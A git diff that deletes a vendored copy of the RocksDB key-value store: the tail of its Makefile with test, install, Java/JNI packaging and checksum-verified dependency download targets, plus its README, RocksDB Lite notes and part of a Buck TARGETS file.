-
-lru_cache_test: cache/lru_cache_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-lua_test: utilities/lua/rocks_lua_test.o db/db_test_util.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-range_del_aggregator_test: db/range_del_aggregator_test.o db/db_test_util.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-blob_db_test: utilities/blob_db/blob_db_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-#-------------------------------------------------
-# make install related stuff
-INSTALL_PATH ?= /usr/local
-
-uninstall:
-	rm -rf $(INSTALL_PATH)/include/rocksdb \
-	  $(INSTALL_PATH)/lib/$(LIBRARY) \
-	  $(INSTALL_PATH)/lib/$(SHARED4) \
-	  $(INSTALL_PATH)/lib/$(SHARED3) \
-	  $(INSTALL_PATH)/lib/$(SHARED2) \
-	  $(INSTALL_PATH)/lib/$(SHARED1)
-
-install-headers:
-	install -d $(INSTALL_PATH)/lib
-	for header_dir in `find "include/rocksdb" -type d`; do \
-		install -d $(INSTALL_PATH)/$$header_dir; \
-	done
-	for header in `find "include/rocksdb" -type f -name *.h`; do \
-		install -C -m 644 $$header $(INSTALL_PATH)/$$header; \
-	done
-
-install-static: install-headers $(LIBRARY)
-	install -C -m 755 $(LIBRARY) $(INSTALL_PATH)/lib
-
-install-shared: install-headers $(SHARED4)
-	install -C -m 755 $(SHARED4) $(INSTALL_PATH)/lib && \
-		ln -fs $(SHARED4) $(INSTALL_PATH)/lib/$(SHARED3) && \
-		ln -fs $(SHARED4) $(INSTALL_PATH)/lib/$(SHARED2) && \
-		ln -fs $(SHARED4) $(INSTALL_PATH)/lib/$(SHARED1)
-
-# install static by default + install shared if it exists
-install: install-static
-	[ -e $(SHARED4) ] && $(MAKE) install-shared || :
-
-#-------------------------------------------------
-
-
-# ---------------------------------------------------------------------------
-# Jni stuff
-# ---------------------------------------------------------------------------
-
-JAVA_INCLUDE = -I$(JAVA_HOME)/include/ -I$(JAVA_HOME)/include/linux
-ifeq ($(PLATFORM), OS_SOLARIS)
-	ARCH := $(shell isainfo -b)
-else
-	ARCH := $(shell getconf LONG_BIT)
-endif
-
-ifeq (,$(findstring ppc,$(MACHINE)))
-        ROCKSDBJNILIB = librocksdbjni-linux$(ARCH).so
-else
-        ROCKSDBJNILIB = librocksdbjni-linux-$(MACHINE).so
-endif
-ROCKSDB_JAR = rocksdbjni-$(ROCKSDB_MAJOR).$(ROCKSDB_MINOR).$(ROCKSDB_PATCH)-linux$(ARCH).jar
-ROCKSDB_JAR_ALL = rocksdbjni-$(ROCKSDB_MAJOR).$(ROCKSDB_MINOR).$(ROCKSDB_PATCH).jar
-ROCKSDB_JAVADOCS_JAR = rocksdbjni-$(ROCKSDB_MAJOR).$(ROCKSDB_MINOR).$(ROCKSDB_PATCH)-javadoc.jar
-ROCKSDB_SOURCES_JAR = rocksdbjni-$(ROCKSDB_MAJOR).$(ROCKSDB_MINOR).$(ROCKSDB_PATCH)-sources.jar
-SHA256_CMD = sha256sum
-
-ZLIB_VER ?= 1.2.11
-ZLIB_SHA256 ?= c3e5e9fdd5004dcb542feda5ee4f0ff0744628baf8ed2dd5d66f8ca1197cb1a1
-ZLIB_DOWNLOAD_BASE ?= http://zlib.net
-BZIP2_VER ?= 1.0.6
-BZIP2_SHA256 ?= a2848f34fcd5d6cf47def00461fcb528a0484d8edef8208d6d2e2909dc61d9cd
-BZIP2_DOWNLOAD_BASE ?= http://www.bzip.org
-SNAPPY_VER ?= 1.1.4
-SNAPPY_SHA256 ?= 134bfe122fd25599bb807bb8130e7ba6d9bdb851e0b16efcb83ac4f5d0b70057
-SNAPPY_DOWNLOAD_BASE ?= https://github.com/google/snappy/releases/download
-LZ4_VER ?= 1.7.5
-LZ4_SHA256 ?= 0190cacd63022ccb86f44fa5041dc6c3804407ad61550ca21c382827319e7e7e
-LZ4_DOWNLOAD_BASE ?= https://github.com/lz4/lz4/archive
-ZSTD_VER ?= 1.2.0
-ZSTD_SHA256 ?= 4a7e4593a3638276ca7f2a09dc4f38e674d8317bbea51626393ca73fc047cbfb
-ZSTD_DOWNLOAD_BASE ?= https://github.com/facebook/zstd/archive
-
-ifeq ($(PLATFORM), OS_MACOSX)
-	ROCKSDBJNILIB = librocksdbjni-osx.jnilib
-	ROCKSDB_JAR = rocksdbjni-$(ROCKSDB_MAJOR).$(ROCKSDB_MINOR).$(ROCKSDB_PATCH)-osx.jar
-	SHA256_CMD = openssl sha256 -r
-ifneq ("$(wildcard $(JAVA_HOME)/include/darwin)","")
-	JAVA_INCLUDE = -I$(JAVA_HOME)/include -I $(JAVA_HOME)/include/darwin
-else
-	JAVA_INCLUDE = -I/System/Library/Frameworks/JavaVM.framework/Headers/
-endif
-endif
-ifeq ($(PLATFORM), OS_FREEBSD)
-	JAVA_INCLUDE += -I$(JAVA_HOME)/include/freebsd
-	ROCKSDBJNILIB = librocksdbjni-freebsd$(ARCH).so
-	ROCKSDB_JAR = rocksdbjni-$(ROCKSDB_MAJOR).$(ROCKSDB_MINOR).$(ROCKSDB_PATCH)-freebsd$(ARCH).jar
-endif
-ifeq ($(PLATFORM), OS_SOLARIS)
-	ROCKSDBJNILIB = librocksdbjni-solaris$(ARCH).so
-	ROCKSDB_JAR = rocksdbjni-$(ROCKSDB_MAJOR).$(ROCKSDB_MINOR).$(ROCKSDB_PATCH)-solaris$(ARCH).jar
-	JAVA_INCLUDE = -I$(JAVA_HOME)/include/ -I$(JAVA_HOME)/include/solaris
-	SHA256_CMD = digest -a sha256
-endif
-ifeq ($(PLATFORM), OS_AIX)
-	JAVA_INCLUDE = -I$(JAVA_HOME)/include/ -I$(JAVA_HOME)/include/aix
-	ROCKSDBJNILIB = librocksdbjni-aix.so
-	EXTRACT_SOURCES = gunzip < TAR_GZ | tar xvf -
-	SNAPPY_MAKE_TARGET = libsnappy.la
-endif
-
-libz.a:
-	-rm -rf zlib-$(ZLIB_VER)
-	curl -O -L ${ZLIB_DOWNLOAD_BASE}/zlib-$(ZLIB_VER).tar.gz
-	ZLIB_SHA256_ACTUAL=`$(SHA256_CMD) zlib-$(ZLIB_VER).tar.gz | cut -d ' ' -f 1`; \
-	if [ "$(ZLIB_SHA256)" != "$$ZLIB_SHA256_ACTUAL" ]; then \
-		echo zlib-$(ZLIB_VER).tar.gz checksum mismatch, expected=\"$(ZLIB_SHA256)\" actual=\"$$ZLIB_SHA256_ACTUAL\"; \
-		exit 1; \
-	fi
-	tar xvzf zlib-$(ZLIB_VER).tar.gz
-	cd zlib-$(ZLIB_VER) && CFLAGS='-fPIC ${EXTRA_CFLAGS}' LDFLAGS='${EXTRA_LDFLAGS}' ./configure --static && make
-	cp zlib-$(ZLIB_VER)/libz.a .
-
-libbz2.a:
-	-rm -rf bzip2-$(BZIP2_VER)
-	curl -O -L ${BZIP2_DOWNLOAD_BASE}/$(BZIP2_VER)/bzip2-$(BZIP2_VER).tar.gz
-	BZIP2_SHA256_ACTUAL=`$(SHA256_CMD) bzip2-$(BZIP2_VER).tar.gz | cut -d ' ' -f 1`; \
-	if [ "$(BZIP2_SHA256)" != "$$BZIP2_SHA256_ACTUAL" ]; then \
-		echo bzip2-$(BZIP2_VER).tar.gz checksum mismatch, expected=\"$(BZIP2_SHA256)\" actual=\"$$BZIP2_SHA256_ACTUAL\"; \
-		exit 1; \
-	fi
-	tar xvzf bzip2-$(BZIP2_VER).tar.gz
-	cd bzip2-$(BZIP2_VER) && make CFLAGS='-fPIC -O2 -g -D_FILE_OFFSET_BITS=64 ${EXTRA_CFLAGS}' AR='ar ${EXTRA_ARFLAGS}'
-	cp bzip2-$(BZIP2_VER)/libbz2.a .
-
-libsnappy.a:
-	-rm -rf snappy-$(SNAPPY_VER)
-	curl -O -L ${SNAPPY_DOWNLOAD_BASE}/$(SNAPPY_VER)/snappy-$(SNAPPY_VER).tar.gz
-	SNAPPY_SHA256_ACTUAL=`$(SHA256_CMD) snappy-$(SNAPPY_VER).tar.gz | cut -d ' ' -f 1`; \
-	if [ "$(SNAPPY_SHA256)" != "$$SNAPPY_SHA256_ACTUAL" ]; then \
-		echo snappy-$(SNAPPY_VER).tar.gz checksum mismatch, expected=\"$(SNAPPY_SHA256)\" actual=\"$$SNAPPY_SHA256_ACTUAL\"; \
-		exit 1; \
-	fi
-	tar xvzf snappy-$(SNAPPY_VER).tar.gz
-	cd snappy-$(SNAPPY_VER) && CFLAGS='${EXTRA_CFLAGS}' CXXFLAGS='${EXTRA_CXXFLAGS}' LDFLAGS='${EXTRA_LDFLAGS}' ./configure --with-pic --enable-static --disable-shared
-	cd snappy-$(SNAPPY_VER) && make ${SNAPPY_MAKE_TARGET}
-	cp snappy-$(SNAPPY_VER)/.libs/libsnappy.a .
-
-liblz4.a:
-	-rm -rf lz4-$(LZ4_VER)
-	curl -O -L ${LZ4_DOWNLOAD_BASE}/v$(LZ4_VER).tar.gz
-	mv v$(LZ4_VER).tar.gz lz4-$(LZ4_VER).tar.gz
-	LZ4_SHA256_ACTUAL=`$(SHA256_CMD) lz4-$(LZ4_VER).tar.gz | cut -d ' ' -f 1`; \
-	if [ "$(LZ4_SHA256)" != "$$LZ4_SHA256_ACTUAL" ]; then \
-		echo lz4-$(LZ4_VER).tar.gz checksum mismatch, expected=\"$(LZ4_SHA256)\" actual=\"$$LZ4_SHA256_ACTUAL\"; \
-		exit 1; \
-	fi
-	tar xvzf lz4-$(LZ4_VER).tar.gz
-	cd lz4-$(LZ4_VER)/lib && make CFLAGS='-fPIC -O2 ${EXTRA_CFLAGS}' all
-	cp lz4-$(LZ4_VER)/lib/liblz4.a .
-
-libzstd.a:
-	-rm -rf zstd-$(ZSTD_VER)
-	curl -O -L ${ZSTD_DOWNLOAD_BASE}/v$(ZSTD_VER).tar.gz
-	mv v$(ZSTD_VER).tar.gz zstd-$(ZSTD_VER).tar.gz
-	ZSTD_SHA256_ACTUAL=`$(SHA256_CMD) zstd-$(ZSTD_VER).tar.gz | cut -d ' ' -f 1`; \
-	if [ "$(ZSTD_SHA256)" != "$$ZSTD_SHA256_ACTUAL" ]; then \
-		echo zstd-$(ZSTD_VER).tar.gz checksum mismatch, expected=\"$(ZSTD_SHA256)\" actual=\"$$ZSTD_SHA256_ACTUAL\"; \
-		exit 1; \
-	fi
-	tar xvzf zstd-$(ZSTD_VER).tar.gz
-	cd zstd-$(ZSTD_VER)/lib && make CFLAGS='-fPIC -O2 ${EXTRA_CFLAGS}' all
-	cp zstd-$(ZSTD_VER)/lib/libzstd.a .
-
-# A version of each $(LIBOBJECTS) compiled with -fPIC and a fixed set of static compression libraries
-java_static_libobjects = $(patsubst %,jls/%,$(LIBOBJECTS))
-CLEAN_FILES += jls
-
-ifneq ($(ROCKSDB_JAVA_NO_COMPRESSION), 1)
-JAVA_COMPRESSIONS = libz.a libbz2.a libsnappy.a liblz4.a libzstd.a
-endif
-
-JAVA_STATIC_FLAGS = -DZLIB -DBZIP2 -DSNAPPY -DLZ4 -DZSTD
-JAVA_STATIC_INCLUDES = -I./zlib-$(ZLIB_VER) -I./bzip2-$(BZIP2_VER) -I./snappy-$(SNAPPY_VER) -I./lz4-$(LZ4_VER)/lib -I./zstd-$(ZSTD_VER)/lib
-
-$(java_static_libobjects): jls/%.o: %.cc $(JAVA_COMPRESSIONS)
-	$(AM_V_CC)mkdir -p $(@D) && $(CXX) $(CXXFLAGS) $(JAVA_STATIC_FLAGS) $(JAVA_STATIC_INCLUDES) -fPIC -c $< -o $@ $(COVERAGEFLAGS)
-
-rocksdbjavastatic: $(java_static_libobjects)
-	cd java;$(MAKE) javalib;
-	rm -f ./java/target/$(ROCKSDBJNILIB)
-	$(CXX) $(CXXFLAGS) -I./java/. $(JAVA_INCLUDE) -shared -fPIC \
-	  -o ./java/target/$(ROCKSDBJNILIB) $(JNI_NATIVE_SOURCES) \
-	  $(java_static_libobjects) $(COVERAGEFLAGS) \
-	  $(JAVA_COMPRESSIONS) $(JAVA_STATIC_LDFLAGS)
-	cd java/target;strip $(STRIPFLAGS) $(ROCKSDBJNILIB)
-	cd java;jar -cf target/$(ROCKSDB_JAR) HISTORY*.md
-	cd java/target;jar -uf $(ROCKSDB_JAR) $(ROCKSDBJNILIB)
-	cd java/target/classes;jar -uf ../$(ROCKSDB_JAR) org/rocksdb/*.class org/rocksdb/util/*.class
-	cd java/target/apidocs;jar -cf ../$(ROCKSDB_JAVADOCS_JAR) *
-	cd java/src/main/java;jar -cf ../../../target/$(ROCKSDB_SOURCES_JAR) org
-
-rocksdbjavastaticrelease: rocksdbjavastatic
-	cd java/crossbuild && vagrant destroy -f && vagrant up linux32 && vagrant halt linux32 && vagrant up linux64 && vagrant halt linux64
-	cd java;jar -cf target/$(ROCKSDB_JAR_ALL) HISTORY*.md
-	cd java/target;jar -uf $(ROCKSDB_JAR_ALL) librocksdbjni-*.so librocksdbjni-*.jnilib
-	cd java/target/classes;jar -uf ../$(ROCKSDB_JAR_ALL) org/rocksdb/*.class org/rocksdb/util/*.class
-
-rocksdbjavastaticreleasedocker: rocksdbjavastatic
-	DOCKER_LINUX_X64_CONTAINER=`docker ps -aqf name=rocksdb_linux_x64-be`; \
-	if [ -z "$$DOCKER_LINUX_X64_CONTAINER" ]; then \
-		docker container create --attach stdin --attach stdout --attach stderr --volume `pwd`:/rocksdb-host --name rocksdb_linux_x64-be evolvedbinary/rocksjava:centos6_x64-be /rocksdb-host/java/crossbuild/docker-build-linux-centos.sh; \
-	fi
-	docker start -a rocksdb_linux_x64-be
-	DOCKER_LINUX_X86_CONTAINER=`docker ps -aqf name=rocksdb_linux_x86-be`; \
-	if [ -z "$$DOCKER_LINUX_X86_CONTAINER" ]; then \
-		docker container create --attach stdin --attach stdout --attach stderr --volume `pwd`:/rocksdb-host --name rocksdb_linux_x86-be evolvedbinary/rocksjava:centos6_x86-be /rocksdb-host/java/crossbuild/docker-build-linux-centos.sh; \
-	fi
-	docker start -a rocksdb_linux_x86-be
-	cd java;jar -cf target/$(ROCKSDB_JAR_ALL) HISTORY*.md
-	cd java/target;jar -uf $(ROCKSDB_JAR_ALL) librocksdbjni-*.so librocksdbjni-*.jnilib
-	cd java/target/classes;jar -uf ../$(ROCKSDB_JAR_ALL) org/rocksdb/*.class org/rocksdb/util/*.class
-
-rocksdbjavastaticpublish: rocksdbjavastaticrelease rocksdbjavastaticpublishcentral
-
-rocksdbjavastaticpublishdocker: rocksdbjavastaticreleasedocker rocksdbjavastaticpublishcentral
-
-rocksdbjavastaticpublishcentral:
-	mvn gpg:sign-and-deploy-file -Durl=https://oss.sonatype.org/service/local/staging/deploy/maven2/ -DrepositoryId=sonatype-nexus-staging -DpomFile=java/rocksjni.pom -Dfile=java/target/rocksdbjni-$(ROCKSDB_MAJOR).$(ROCKSDB_MINOR).$(ROCKSDB_PATCH)-javadoc.jar -Dclassifier=javadoc
-	mvn gpg:sign-and-deploy-file -Durl=https://oss.sonatype.org/service/local/staging/deploy/maven2/ -DrepositoryId=sonatype-nexus-staging -DpomFile=java/rocksjni.pom -Dfile=java/target/rocksdbjni-$(ROCKSDB_MAJOR).$(ROCKSDB_MINOR).$(ROCKSDB_PATCH)-sources.jar -Dclassifier=sources
-	mvn gpg:sign-and-deploy-file -Durl=https://oss.sonatype.org/service/local/staging/deploy/maven2/ -DrepositoryId=sonatype-nexus-staging -DpomFile=java/rocksjni.pom -Dfile=java/target/rocksdbjni-$(ROCKSDB_MAJOR).$(ROCKSDB_MINOR).$(ROCKSDB_PATCH)-linux64.jar -Dclassifier=linux64
-	mvn gpg:sign-and-deploy-file -Durl=https://oss.sonatype.org/service/local/staging/deploy/maven2/ -DrepositoryId=sonatype-nexus-staging -DpomFile=java/rocksjni.pom -Dfile=java/target/rocksdbjni-$(ROCKSDB_MAJOR).$(ROCKSDB_MINOR).$(ROCKSDB_PATCH)-linux32.jar -Dclassifier=linux32
-	mvn gpg:sign-and-deploy-file -Durl=https://oss.sonatype.org/service/local/staging/deploy/maven2/ -DrepositoryId=sonatype-nexus-staging -DpomFile=java/rocksjni.pom -Dfile=java/target/rocksdbjni-$(ROCKSDB_MAJOR).$(ROCKSDB_MINOR).$(ROCKSDB_PATCH)-osx.jar -Dclassifier=osx
-	mvn gpg:sign-and-deploy-file -Durl=https://oss.sonatype.org/service/local/staging/deploy/maven2/ -DrepositoryId=sonatype-nexus-staging -DpomFile=java/rocksjni.pom -Dfile=java/target/rocksdbjni-$(ROCKSDB_MAJOR).$(ROCKSDB_MINOR).$(ROCKSDB_PATCH)-win64.jar -Dclassifier=win64
-	mvn gpg:sign-and-deploy-file -Durl=https://oss.sonatype.org/service/local/staging/deploy/maven2/ -DrepositoryId=sonatype-nexus-staging -DpomFile=java/rocksjni.pom -Dfile=java/target/rocksdbjni-$(ROCKSDB_MAJOR).$(ROCKSDB_MINOR).$(ROCKSDB_PATCH).jar
-
-# A version of each $(LIBOBJECTS) compiled with -fPIC
-java_libobjects = $(patsubst %,jl/%,$(LIBOBJECTS))
-CLEAN_FILES += jl
-
-$(java_libobjects): jl/%.o: %.cc
-	$(AM_V_CC)mkdir -p $(@D) && $(CXX) $(CXXFLAGS) -fPIC -c $< -o $@ $(COVERAGEFLAGS)
-
-rocksdbjava: $(java_libobjects)
-	$(AM_V_GEN)cd java;$(MAKE) javalib;
-	$(AM_V_at)rm -f ./java/target/$(ROCKSDBJNILIB)
-	$(AM_V_at)$(CXX) $(CXXFLAGS) -I./java/. $(JAVA_INCLUDE) -shared -fPIC -o ./java/target/$(ROCKSDBJNILIB) $(JNI_NATIVE_SOURCES) $(java_libobjects) $(JAVA_LDFLAGS) $(COVERAGEFLAGS)
-	$(AM_V_at)cd java;jar -cf target/$(ROCKSDB_JAR) HISTORY*.md
-	$(AM_V_at)cd java/target;jar -uf $(ROCKSDB_JAR) $(ROCKSDBJNILIB)
-	$(AM_V_at)cd java/target/classes;jar -uf ../$(ROCKSDB_JAR) org/rocksdb/*.class org/rocksdb/util/*.class
-
-jclean:
-	cd java;$(MAKE) clean;
-
-jtest_compile: rocksdbjava
-	cd java;$(MAKE) java_test
-
-jtest_run:
-	cd java;$(MAKE) run_test
-
-jtest: rocksdbjava
-	cd java;$(MAKE) sample;$(MAKE) test;
-
-jdb_bench:
-	cd java;$(MAKE) db_bench;
-
-commit_prereq: build_tools/rocksdb-lego-determinator \
-               build_tools/precommit_checker.py
-	J=$(J) build_tools/precommit_checker.py unit unit_481 clang_unit release release_481 clang_release tsan asan ubsan lite unit_non_shm
-	$(MAKE) clean && $(MAKE) jclean && $(MAKE) rocksdbjava;
-
-# ---------------------------------------------------------------------------
-#  	Platform-specific compilation
-# ---------------------------------------------------------------------------
-
-ifeq ($(PLATFORM), IOS)
-# For iOS, create universal object files to be used on both the simulator and
-# a device.
-PLATFORMSROOT=/Applications/Xcode.app/Contents/Developer/Platforms
-SIMULATORROOT=$(PLATFORMSROOT)/iPhoneSimulator.platform/Developer
-DEVICEROOT=$(PLATFORMSROOT)/iPhoneOS.platform/Developer
-IOSVERSION=$(shell defaults read $(PLATFORMSROOT)/iPhoneOS.platform/version CFBundleShortVersionString)
-
-.cc.o:
-	mkdir -p ios-x86/$(dir $@)
-	$(CXX) $(CXXFLAGS) -isysroot $(SIMULATORROOT)/SDKs/iPhoneSimulator$(IOSVERSION).sdk -arch i686 -arch x86_64 -c $< -o ios-x86/$@
-	mkdir -p ios-arm/$(dir $@)
-	xcrun -sdk iphoneos $(CXX) $(CXXFLAGS) -isysroot $(DEVICEROOT)/SDKs/iPhoneOS$(IOSVERSION).sdk -arch armv6 -arch armv7 -arch armv7s -arch arm64 -c $< -o ios-arm/$@
-	lipo ios-x86/$@ ios-arm/$@ -create -output $@
-
-.c.o:
-	mkdir -p ios-x86/$(dir $@)
-	$(CC) $(CFLAGS) -isysroot $(SIMULATORROOT)/SDKs/iPhoneSimulator$(IOSVERSION).sdk -arch i686 -arch x86_64 -c $< -o ios-x86/$@
-	mkdir -p ios-arm/$(dir $@)
-	xcrun -sdk iphoneos $(CC) $(CFLAGS) -isysroot $(DEVICEROOT)/SDKs/iPhoneOS$(IOSVERSION).sdk -arch armv6 -arch armv7 -arch armv7s -arch arm64 -c $< -o ios-arm/$@
-	lipo ios-x86/$@ ios-arm/$@ -create -output $@
-
-else
-.cc.o:
-	$(AM_V_CC)$(CXX) $(CXXFLAGS) -c $< -o $@ $(COVERAGEFLAGS)
-
-.c.o:
-	$(AM_V_CC)$(CC) $(CFLAGS) -c $< -o $@
-endif
-
-# ---------------------------------------------------------------------------
-#  	Source files dependencies detection
-# ---------------------------------------------------------------------------
-
-all_sources = $(LIB_SOURCES) $(MAIN_SOURCES) $(MOCK_LIB_SOURCES) $(TOOL_LIB_SOURCES) $(BENCH_LIB_SOURCES) $(TEST_LIB_SOURCES) $(EXP_LIB_SOURCES)
-DEPFILES = $(all_sources:.cc=.d)
-
-# Add proper dependency support so changing a .h file forces a .cc file to
-# rebuild.
-
-# The .d file indicates .cc file's dependencies on .h files. We generate such
-# dependency by g++'s -MM option, whose output is a make dependency rule.
-$(DEPFILES): %.d: %.cc
-	@$(CXX) $(CXXFLAGS) $(PLATFORM_SHARED_CFLAGS) \
-	  -MM -MT'$@' -MT'$(<:.cc=.o)' "$<" -o '$@'
-
-depend: $(DEPFILES)
-
-# if the make goal is either "clean" or "format", we shouldn't
-# try to import the *.d files.
-# TODO(kailiu) The unfamiliarity of Make's conditions leads to the ugly
-# working solution.
-ifneq ($(MAKECMDGOALS),clean)
-ifneq ($(MAKECMDGOALS),format)
-ifneq ($(MAKECMDGOALS),jclean)
-ifneq ($(MAKECMDGOALS),jtest)
-ifneq ($(MAKECMDGOALS),package)
-ifneq ($(MAKECMDGOALS),analyze)
--include $(DEPFILES)
-endif
-endif
-endif
-endif
-endif
-endif
diff --git a/thirdparty/rocksdb/README.md b/thirdparty/rocksdb/README.md
deleted file mode 100644
index 550c352..0000000
--- a/thirdparty/rocksdb/README.md
+++ /dev/null
@@ -1,27 +0,0 @@
-## RocksDB: A Persistent Key-Value Store for Flash and RAM Storage
-
-[![Build Status](https://travis-ci.org/facebook/rocksdb.svg?branch=master)](https://travis-ci.org/facebook/rocksdb)
-[![Build status](https://ci.appveyor.com/api/projects/status/fbgfu0so3afcno78/branch/master?svg=true)](https://ci.appveyor.com/project/Facebook/rocksdb/branch/master)
-
-
-RocksDB is developed and maintained by Facebook Database Engineering Team.
-It is built on earlier work on LevelDB by Sanjay Ghemawat (sanjay@google.com)
-and Jeff Dean (jeff@google.com)
-
-This code is a library that forms the core building block for a fast
-key value server, especially suited for storing data on flash drives.
-It has a Log-Structured-Merge-Database (LSM) design with flexible tradeoffs
-between Write-Amplification-Factor (WAF), Read-Amplification-Factor (RAF)
-and Space-Amplification-Factor (SAF). It has multi-threaded compactions,
-making it specially suitable for storing multiple terabytes of data in a
-single database.
-
-Start with example usage here: https://github.com/facebook/rocksdb/tree/master/examples
-
-See the [github wiki](https://github.com/facebook/rocksdb/wiki) for more explanation.
-
-The public interface is in `include/`.  Callers should not include or
-rely on the details of any other header files in this package.  Those
-internal APIs may be changed without warning.
-
-Design discussions are conducted in https://www.facebook.com/groups/rocksdb.dev/
diff --git a/thirdparty/rocksdb/ROCKSDB_LITE.md b/thirdparty/rocksdb/ROCKSDB_LITE.md
deleted file mode 100644
index 41cfbec..0000000
--- a/thirdparty/rocksdb/ROCKSDB_LITE.md
+++ /dev/null
@@ -1,21 +0,0 @@
-# RocksDBLite
-
-RocksDBLite is a project focused on mobile use cases, which don't need a lot of fancy things we've built for server workloads and they are very sensitive to binary size. For that reason, we added a compile flag ROCKSDB_LITE that comments out a lot of the nonessential code and keeps the binary lean.
-
-Some examples of the features disabled by ROCKSDB_LITE:
-* compiled-in support for LDB tool
-* No backupable DB
-* No support for replication (which we provide in form of TrasactionalIterator)
-* No advanced monitoring tools
-* No special-purpose memtables that are highly optimized for specific use cases
-* No Transactions
-
-When adding a new big feature to RocksDB, please add ROCKSDB_LITE compile guard if:
-* Nobody from mobile really needs your feature,
-* Your feature is adding a lot of weight to the binary.
-
-Don't add ROCKSDB_LITE compile guard if:
-* It would introduce a lot of code complexity. Compile guards make code harder to read. It's a trade-off.
-* Your feature is not adding a lot of weight.
-
-If unsure, ask. :)
diff --git a/thirdparty/rocksdb/TARGETS b/thirdparty/rocksdb/TARGETS
deleted file mode 100644
index ac85eab..0000000
--- a/thirdparty/rocksdb/TARGETS
+++ /dev/null
@@ -1,534 +0,0 @@
-
-import os
-
-TARGETS_PATH = os.path.dirname(__file__)
-REPO_PATH = TARGETS_PATH[(TARGETS_PATH.find('fbcode/') + len('fbcode/')):] + "/"
-BUCK_BINS = "buck-out/gen/" + REPO_PATH
-TEST_RUNNER = REPO_PATH + "buckifier/rocks_test_runner.sh"
-rocksdb_compiler_flags = [
-  "-fno-builtin-memcmp",
-  "-DROCKSDB_PLATFORM_POSIX",
-  "-DROCKSDB_LIB_IO_POSIX",
-  "-DROCKSDB_FALLOCATE_PRESENT",
-  "-DROCKSDB_MALLOC_USABLE_SIZE",
-  "-DROCKSDB_RANGESYNC_PRESENT",
-  "-DROCKSDB_SCHED_GETCPU_PRESENT",
-  "-DROCKSDB_SUPPORT_THREAD_LOCAL",
-  "-DOS_LINUX",
-  "-DROCKSDB_UBSAN_RUN",
-  # Flags to enable libs we include
-  "-DSNAPPY",
-  "-DZLIB",
-  "-DBZIP2",
-  "-DLZ4",
-  "-DZSTD",
-  "-DGFLAGS=gflags",
-  "-DNUMA",
-  "-DTBB",
-  # Needed to compile in fbcode
-  "-Wno-expansion-to-defined",
-]
-
-rocksdb_external_deps = [
-  ('bzip2', None, 'bz2'),
-  ('snappy', None, "snappy"),
-  ('zlib', None, 'z'),
-  ('gflags', None, 'gflags'),
-  ('lz4', None, 'lz4'),
-  ('zstd', None),
-  ('tbb', None),
-  ("numa", None, "numa"),
-  ("googletest", None, "gtest"),
-]
-
-rocksdb_preprocessor_flags = [
-  # Directories with files for #include
-  "-I" + REPO_PATH + "include/",
-  "-I" + REPO_PATH,
-]
-
-rocksdb_arch_preprocessor_flags = {
-  "x86_64": ["-DHAVE_SSE42"],
-}
-
-cpp_library(
-    name = "rocksdb_lib",
-    headers = AutoHeaders.RECURSIVE_GLOB,
-    srcs = [
-      "cache/clock_cache.cc",
-      "cache/lru_cache.cc",
-      "cache/sharded_cache.cc",
-      "db/builder.cc",
-      "db/c.cc",
-      "db/column_family.cc",
-      "db/compacted_db_impl.cc",
-      "db/compaction.cc",
-      "db/compaction_iterator.cc",
-      "db/compaction_job.cc",
-      "db/compaction_picker.cc",
-      "db/compaction_picker_universal.cc",
-      "db/convenience.cc",
-      "db/db_filesnapshot.cc",
-      "db/db_impl.cc",
-      "db/db_impl_write.cc",
-      "db/db_impl_compaction_flush.cc",
-      "db/db_impl_files.cc",
-      "db/db_impl_open.cc",
-      "db/db_impl_debug.cc",
-      "db/db_impl_experimental.cc",
-      "db/db_impl_readonly.cc",
-      "db/db_info_dumper.cc",
-      "db/db_iter.cc",
-      "db/dbformat.cc",
-      "db/event_helpers.cc",
-      "db/experimental.cc",
-      "db/external_sst_file_ingestion_job.cc",
-      "db/file_indexer.cc",
-      "db/flush_job.cc",
-      "db/flush_scheduler.cc",
-      "db/forward_iterator.cc",
-      "db/internal_stats.cc",
-      "db/log_reader.cc",
-      "db/log_writer.cc",
-      "db/malloc_stats.cc",
-      "db/managed_iterator.cc",
-      "db/memtable.cc",
-      "db/memtable_list.cc",
-      "db/merge_helper.cc",
-      "db/merge_operator.cc",
-      "db/range_del_aggregator.cc",
-      "db/repair.cc",
-      "db/snapshot_impl.cc",
-      "db/table_cache.cc",
-      "db/table_properties_collector.cc",
-      "db/transaction_log_impl.cc",
-      "db/version_builder.cc",
-      "db/version_edit.cc",
-      "db/version_set.cc",
-      "db/wal_manager.cc",
-      "db/write_batch.cc",
-      "db/write_batch_base.cc",
-      "db/write_controller.cc",
-      "db/write_thread.cc",
-      "env/env.cc",
-      "env/env_chroot.cc",
-      "env/env_encryption.cc",
-      "env/env_hdfs.cc",
-      "env/env_posix.cc",
-      "env/io_posix.cc",
-      "env/mock_env.cc",
-      "memtable/alloc_tracker.cc",
-      "memtable/hash_cuckoo_rep.cc",
-      "memtable/hash_linklist_rep.cc",
-      "memtable/hash_skiplist_rep.cc",
-      "memtable/skiplistrep.cc",
-      "memtable/vectorrep.cc",
-      "memtable/write_buffer_manager.cc",
-      "monitoring/histogram.cc",
-      "monitoring/histogram_windowing.cc",
-      "monitoring/instrumented_mutex.cc",
-      "monitoring/iostats_context.cc",
-      "monitoring/perf_context.cc",
-      "monitoring/perf_level.cc",
-      "monitoring/statistics.cc",
-      "monitoring/thread_status_impl.cc",
-      "monitoring/thread_status_updater.cc",
-      "monitoring/thread_status_updater_debug.cc",
-      "monitoring/thread_status_util.cc",
-      "monitoring/thread_status_util_debug.cc",
-      "options/cf_options.cc",
-      "options/db_options.cc",
-      "options/options.cc",
-      "options/options_helper.cc",
-      "options/options_parser.cc",
-      "options/options_sanity_check.cc",
-      "port/port_posix.cc",
-      "port/stack_trace.cc",
-      "table/adaptive_table_factory.cc",
-      "table/block.cc",
-      "table/block_based_filter_block.cc",
-      "table/block_based_table_builder.cc",
-      "table/block_based_table_factory.cc",
-      "table/block_based_table_reader.cc",
-      "table/block_builder.cc",
-      "table/block_prefix_index.cc",
-      "table/bloom_block.cc",
-      "table/cuckoo_table_builder.cc",
-      "table/cuckoo_table_factory.cc",
-      "table/cuckoo_table_reader.cc",
-      "table/flush_block_policy.cc",
-      "table/format.cc",
-      "table/full_filter_block.cc",
-      "table/get_context.cc",
-      "table/index_builder.cc",
